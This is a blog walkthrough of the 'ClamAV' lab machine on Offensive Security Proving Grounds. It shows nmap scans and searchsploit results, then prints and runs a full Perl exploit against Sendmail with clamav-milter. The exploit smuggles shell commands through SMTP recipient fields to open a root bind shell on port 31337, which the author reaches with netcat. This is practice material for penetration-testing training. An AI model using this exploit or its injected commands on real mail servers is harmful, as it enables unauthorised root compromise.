Offensive Security – Proving Grounds – ClamAV Write-up – No Metasploit

Posted on by trenchesofit

ClamAV is a machine available in the Practice area of the Offensive Security Proving Grounds. This box difficulty is easy. Lets dive in and take a look.

Reconnaissance

Starting with a nmap scan enabling all scripts, detecting versions, and output all formats to files starting with the string “simple”.

kali@kali:~/oscp/offsec/clamav$ nmap -sC -sV -oA simple 192.168.102.42
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-25 18:45 EST
Nmap scan report for 192.168.102.42
Host is up (0.065s latency).
Not shown: 994 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA)
|_  1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA)
25/tcp  open  smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp  open  http        Apache httpd 1.3.33 ((Debian GNU/Linux))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.33 (Debian GNU/Linux)
|_http-title: Ph33r
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
199/tcp open  smux        Linux SNMP multiplexer
445/tcp open  netbios-ssn Samba smbd 3.0.14a-Debian (workgroup: WORKGROUP)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 7h29m58s, deviation: 3h32m07s, median: 4h59m58s
|_nbstat: NetBIOS name: 0XBABE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.14a-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-11-25T23:48:36-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: share (dangerous)
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 265.51 seconds

Weaponization and Delivery

So using this nmap scan and a quick search based on the name of the box we see a few possible exploits.

kali@kali:~/oscp/offsec/clamav$ searchsploit clamav
------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                |  Path
------------------------------------------------------------------------------ ---------------------------------
Clam Anti-Virus ClamAV 0.88.x - UPX Compressed PE File Heap Buffer Overflow   | linux/dos/28348.txt
ClamAV / UnRAR - .RAR Handling Remote Null Pointer Dereference                | linux/remote/30291.txt
ClamAV 0.91.2 - libclamav MEW PE Buffer Overflow                              | linux/remote/4862.py
ClamAV < 0.102.0 - 'bytecode_vm' Code Execution                               | linux/local/47687.py
ClamAV < 0.94.2 - JPEG Parsing Recursive Stack Overflow (PoC)                 | multiple/dos/7330.c
ClamAV Daemon 0.65 - UUEncoded Message Denial of Service                      | linux/dos/23667.txt
ClamAV Milter - Blackhole-Mode Remote Code Execution (Metasploit)             | linux/remote/16924.rb
ClamAV Milter 0.92.2 - Blackhole-Mode (Sendmail) Code Execution (Metasploit)  | multiple/remote/9913.rb
Sendmail with clamav-milter < 0.91.2 - Remote Command Execution               | multiple/remote/4761.pl
------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

From the list showing “clamav” exploits we see one that is targeting SMTP which we know is open from the nmap scan.

kali@kali:~/oscp/offsec/clamav$ searchsploit -m multiple/remote/4761.pl
  Exploit: Sendmail with clamav-milter < 0.91.2 - Remote Command Execution
      URL: https://www.exploit-db.com/exploits/4761
     Path: /usr/share/exploitdb/exploits/multiple/remote/4761.pl
File Type: ASCII text, with CRLF line terminators

Copied to: /home/kali/oscp/offsec/clamav/4761.pl

Lets take a look at the pearl script.

kali@kali:~/oscp/offsec/clamav$ cat 4761.pl 
### black-hole.pl
### Sendmail w/ clamav-milter Remote Root Exploit
### Copyright (c) 2007 Eliteboy
########################################################
use IO::Socket;

print "Sendmail w/ clamav-milter Remote Root Exploit\n";
print "Copyright (C) 2007 Eliteboy\n";

if ($#ARGV != 0) {print "Give me a host to connect.\n";exit;}

print "Attacking $ARGV[0]...\n";

$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '25',
                              Proto    => 'tcp');

print $sock "ehlo you\r\n";
print $sock "mail from: <>\r\n";
print $sock "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n";
print $sock "rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n";
print $sock "data\r\n.\r\nquit\r\n";

while (<$sock>) {
        print;
}

# milw0rm.com [2007-12-21]

So it looks like the exploit will be opening a new port 31337 and running sh as root. Lets take a look at the current status of the port.

kali@kali:~/oscp/offsec/clamav$ nmap -p 31337 192.168.102.42
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-25 18:57 EST
Nmap scan report for 192.168.102.42
Host is up (0.083s latency).

PORT      STATE  SERVICE
31337/tcp closed Elite

Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds

Foothold

Port 31337 is closed as expected. Running the exploit.

kali@kali:~/oscp/offsec/clamav$ sudo perl 4761.pl 192.168.102.42
Sendmail w/ clamav-milter Remote Root Exploit
Copyright (C) 2007 Eliteboy
Attacking 192.168.102.42...
220 localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3; Thu, 26 Nov 2020 00:03:14 -0500; (No UCE/UBE) logging access from: [192.168.49.102](TEMP)-[192.168.49.102]
250-localhost.localdomain Hello [192.168.49.102], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-DELIVERBY
250 HELP
250 2.1.0 <>... Sender ok
250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf">... Recipient ok
250 2.1.5 <nobody+"|/etc/init.d/inetd restart">... Recipient ok
354 Enter mail, end with "." on a line by itself
250 2.0.0 0AQ53Eqv004156 Message accepted for delivery
221 2.0.0 localhost.localdomain closing connection

No errors with execution and the message looks to be accepted for delivery. Looking back at the port, its now open!

kali@kali:~/oscp/offsec/clamav$ nmap -p 31337 192.168.102.42
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-25 19:05 EST
Nmap scan report for 192.168.102.42
Host is up (0.066s latency).

PORT      STATE SERVICE
31337/tcp open  Elite

Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds

Netcat to the port.

kali@kali:~/oscp/offsec/clamav$ nc 192.168.102.42 31337
whoami
root

Wow, root immediately.

bash -i
bash: no job control in this shell
root@0xbabe:/# cd /root
root@0xbabe:/root# ls
dbootstrap_settings
install-report.template
proof.txt
root@0xbabe:/root# cat proof.txt
5a32****SNIP****7974
root@0xbabe:/root#

“bash -i” to upgrade the shell just a bit. Navigate to the root desktop to grab the proof.txt.

Conclusion

ClamAV is a fun one, but the machine name gave a huge advantage to the attacker. The Offensive Security community claims that ClamAV is a retired OSCP exam box. So it was good practice if nothing else. Until next time, stay safe in the Trenches of IT!